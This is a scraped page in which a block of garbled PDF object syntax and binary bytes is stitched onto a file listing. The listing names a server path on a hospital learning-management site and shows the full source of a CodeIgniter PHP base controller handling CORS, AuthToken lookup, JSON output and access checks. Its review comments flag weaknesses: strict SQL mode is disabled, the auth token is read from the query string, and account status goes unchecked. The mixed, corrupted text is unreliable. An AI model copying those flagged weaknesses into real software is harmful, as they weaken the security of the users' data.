%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream


 
Current File : /var/www/html/shardahospital.org/shardalms/student-panel/api/application/core/MY_Controller.php
<?php
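/**
 * Base controller for the API: sends CORS headers, answers preflight requests,
 * defines the per-request constants (IS_AJAX, IS_POST, USER_ID) and offers
 * helpers for JSON output, form-validation callbacks and module access checks.
 *
 * NOTE(review): every public method of a CodeIgniter controller can be reached
 * by URL unless routing excludes it. The helpers stay public because
 * form-validation callbacks and subclasses call them; confirm the routes do not
 * expose them in a harmful way.
 */
class MY_Controller extends CI_Controller {
	/**
	 * Bootstraps each request: CORS headers, preflight short-circuit, timezone,
	 * request constants, the common model and (for POST) form validation.
	 */
	function __construct() {
		parent::__construct();

		$this->_send_cors_headers();

		// A CORS preflight needs only the headers; stop before touching the database.
		if ($this->input->method() === 'options') {
			header('HTTP/1.1 200 OK');
			header('Access-Control-Allow-Methods: POST, GET, OPTIONS');
			header('Access-Control-Max-Age: 86400');
			exit;
		}

		date_default_timezone_set('Asia/Kolkata');
		// Guarded so a second controller instance in one request does not redefine them.
		defined('IS_AJAX') OR define('IS_AJAX', (bool) $this->input->is_ajax_request());
		defined('IS_POST') OR define('IS_POST', $this->input->method() === 'post');

		// NOTE(review): clearing sql_mode switches off the server's strict SQL checks
		// for this connection, so invalid or over-long values may be stored silently.
		// Kept as-is because existing queries may depend on it; confirm it is needed.
		$this->db->query("SET sql_mode=''");
		$this->load->model('common_model', 'common');

		$dtl = $this->loggedData();
		// loggedData() returns [] for anonymous requests, so the key may be absent.
		defined('USER_ID') OR define('USER_ID', !empty($dtl['id']) ? $dtl['id'] : '');

		if (IS_POST) {
			// Shared validation messages, keyed by rule name.
			$this->req = array(
				'required'  => '%s required',
				'is_unique' => 'This %s is already used',
				'numeric'   => '%s must be numeric',
				'integer'   => '%s must be numeric',
			);
			$this->load->library('form_validation');
		}
	}

	/**
	 * Sends the CORS response headers.
	 *
	 * The request's Origin is echoed back, together with
	 * Access-Control-Allow-Credentials, only when it exactly matches an entry of
	 * the 'cors_allowed_origins' config item. Reflecting any Origin while allowing
	 * credentials would let every website read responses made with the visitor's
	 * cookies. 'cors_allowed_origins' is a new config item introduced with this
	 * check and must be set to an array of full origins (scheme://host[:port]);
	 * while it is unset no origin is allowed.
	 */
	private function _send_cors_headers() {
		$origin  = $this->input->server('HTTP_ORIGIN');
		$allowed = $this->config->item('cors_allowed_origins');

		// The response differs per Origin, so caches must not share it across origins.
		header('Vary: Origin');

		if (is_string($origin) && $origin !== '' && is_array($allowed) && in_array($origin, $allowed, TRUE)) {
			header('Access-Control-Allow-Origin: '.$origin);
			header('Access-Control-Allow-Credentials: true');
		}
		header('Access-Control-Allow-Headers: Content-Type, Origin, Accept, AuthToken');
	}

	/**
	 * Looks up the applicant that owns the AuthToken sent with the request.
	 *
	 * @return array Row with id, mob, name, email and status, or [] when no token
	 *               was sent or no applicant matches it.
	 */
	function loggedData() {
		// NOTE(review): the token is read from GET/POST data; a token passed in the
		// query string ends up in access logs and Referer headers. The header
		// variant below was already disabled in the original code.
		//$a=$this->input->get_request_header('AuthToken', TRUE);
		$token = $this->input->get_post('AuthToken');

		// AuthToken[]=... arrives as an array; only a non-empty string is a usable token.
		if (!is_string($token) || !$token) {
			return [];
		}

		// NOTE(review): "status" is selected but not checked here, so a token of a
		// disabled applicant would still authenticate unless callers test it.
		$dtl = $this->db->select("id, mob, name, email, status")
			->where('auth_token', $token)
			->get("applicants")
			->row_array();
		return $dtl ? $dtl : [];
	}

	/**
	 * Sends $res as a JSON response and ends the request.
	 *
	 * @param mixed $res        Response payload; an empty value becomes an empty array.
	 * @param bool  $jsonNumChk When true, numeric strings are encoded as numbers.
	 */
	function json_data($res, $jsonNumChk=false) {
		header('Content-Type: application/json');
		$res = $res ? $res : array();

		// Hand the current CSRF token back so the client can send it with its next POST.
		if ($this->config->item('csrf_protection') === TRUE) {
			$res['csrf_token'] = $this->security->get_csrf_token_name();
			$res['csrf_hash']  = $this->security->get_csrf_hash();
		}

		$json = json_encode($res, $jsonNumChk ? JSON_NUMERIC_CHECK : 0);
		if ($json === FALSE) {
			// Encoding failed (for example invalid UTF-8): report an error instead of
			// returning an empty body with status 200.
			http_response_code(500);
			$json = '{"success":"F","msg":"Unable to encode response"}';
		}
		die($json);
	}

	/**
	 * Form-validation callback: rejects an upload whose file name does not pass
	 * check_image_ext().
	 *
	 * Only the client-supplied file name is checked here. The code that stores the
	 * upload still has to verify the content and must not save it under a
	 * client-chosen name inside a directory that executes scripts.
	 *
	 * @param mixed  $v     Field value passed by the validation library (unused).
	 * @param string $param Key of the upload in $_FILES.
	 * @return bool TRUE when no file was sent or its name is accepted.
	 */
	function img_ext_check($v, $param='image') {
		// The key is missing when the form carries no file field.
		$name = isset($_FILES[$param]['name']) ? $_FILES[$param]['name'] : '';

		if ($name && !check_image_ext($name)) {
			$this->form_validation->set_message('img_ext_check', 'Please upload .jpg, .jpeg, .gif or .png file only');
			return FALSE;
		}
		return TRUE;
	}

	/**
	 * Form-validation callback: accepts an empty value or one that
	 * is_valid_date() accepts.
	 *
	 * @param mixed $v Submitted value.
	 * @return bool
	 */
	function valid_date($v) {
		if ($v && !is_valid_date($v)) {
			$this->form_validation->set_message("valid_date", "Invalid date format!");
			return FALSE;
		}
		return TRUE;
	}

	/**
	 * Tells whether the current user may use $module.
	 *
	 * @param string $module Module key looked up in the user's module list.
	 * @return bool
	 */
	function is_access($module) {
		// USER_TYPE is not defined in this class. Without the defined() check PHP 8
		// throws on the undefined constant, and a loose == would let a USER_TYPE of
		// 0 or true compare equal to 'ADMIN' on older PHP versions.
		if (defined('USER_TYPE') && USER_TYPE === 'ADMIN') {
			return TRUE;
		}

		// NOTE(review): USER_ID is '' for anonymous requests; confirm that
		// auth_model::modules() returns no modules in that case.
		$this->load->model('auth_model', 'auth');
		$modules = $this->auth->modules(USER_ID);
		return isset($modules[$module]);
	}

	/**
	 * Ends the request with a JSON denial when the current user may not use $module.
	 *
	 * @param string $module Module key.
	 */
	function checkAccess($module) {
		if (!$this->is_access($module)) {
			// json_data() terminates the request, so nothing after this call runs.
			$this->json_data(array('success'=>'F', 'msg'=>'You are not allowed to access this page'));
		}
	}
}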

//EOF
